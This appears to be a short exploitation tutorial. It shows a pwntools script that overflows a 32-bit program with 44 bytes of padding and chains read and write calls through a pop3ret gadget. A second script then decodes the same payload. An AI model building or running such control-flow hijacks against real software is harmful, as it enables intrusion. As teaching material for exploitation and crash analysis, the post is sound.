PWN a program




Hijacking a program to run your code!


OK, this code is very powerful :) For example, it can turn a hello-world program into one that shuts down your computer.
Basically, we take control of EIP and then run a read syscall so that we can place our malicious code somewhere in the program's memory.
Then we can also write something to the screen! The code below takes input from us and writes it to the screen.

from pwn import *
import sys

read = 0x80517f0
write = 0x8051850
pop3ret = 0x8048882

# empty payload (bytes, so it works on Python 3)
payload = b""
# padding up to the saved return address
payload += b"A" * 44
# read something from stdin
payload += pack(read)
payload += pack(pop3ret)     # where read returns to
payload += pack(0x0)         # fd = STDIN
payload += pack(0xfffdd000)  # buf
payload += pack(0x200)       # nbyte
# write to terminal
payload += pack(write)
payload += pack(0x8048b60)   # where write returns to
payload += pack(0x1)         # fd = STDOUT
payload += pack(0xfffdd000)  # buf
payload += pack(0x200)       # nbyte

# emit the raw payload bytes
sys.stdout.buffer.write(payload)
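To see why the words sit in that order, here is an added example (not part of the original post) that rebuilds the same bytes with struct and follows each ret through them, the way you would read this input back out of a crash dump. It assumes 32-bit little-endian cdecl and that pop3ret is a pop; pop; pop; ret gadget, as its name suggests; walk_chain and shared_buffers are names made up for this example.

```python
import struct

# Values copied from the script above; roles follow the i386 cdecl stack layout.
READ, WRITE, POP3RET = 0x80517f0, 0x8051850, 0x8048882
FUNCS = {READ: "read", WRITE: "write"}
PAD = 44  # bytes of filler before the saved return address

def build_payload():
    """Rebuild the same byte string with struct instead of pwntools."""
    words = [READ, POP3RET, 0x0, 0xfffdd000, 0x200,
             WRITE, 0x8048b60, 0x1, 0xfffdd000, 0x200]
    return b"A" * PAD + b"".join(struct.pack("<I", w) for w in words)

def walk_chain(payload, pad=PAD):
    """Follow each ret through the payload; return (offset, role, value) rows."""
    body = payload[pad:]
    words = struct.unpack("<%dI" % (len(body) // 4), body[:len(body) // 4 * 4])
    rows, i = [], 0
    while i + 4 < len(words) and words[i] in FUNCS:
        name, off = FUNCS[words[i]], pad + 4 * i
        rows.append((off, "ret to " + name, words[i]))
        rows.append((off + 4, name + " return address", words[i + 1]))
        for n, arg in enumerate(("fd", "buf", "nbyte")):
            rows.append((off + 8 + 4 * n, name + " " + arg, words[i + 2 + n]))
        if words[i + 1] != POP3RET:
            break  # control leaves the words we can account for
        # pop; pop; pop discards the three arguments, then ret takes the next word
        i += 5
    return rows

def shared_buffers(rows):
    """Buffers that one call fills and a later call reads back out."""
    filled = {v for _, role, v in rows if role == "read buf"}
    return sorted(v for _, role, v in rows if role == "write buf" and v in filled)

if __name__ == "__main__":
    for off, role, value in walk_chain(build_payload()):
        print("+%3d  %-22s 0x%08x" % (off, role, value))
```
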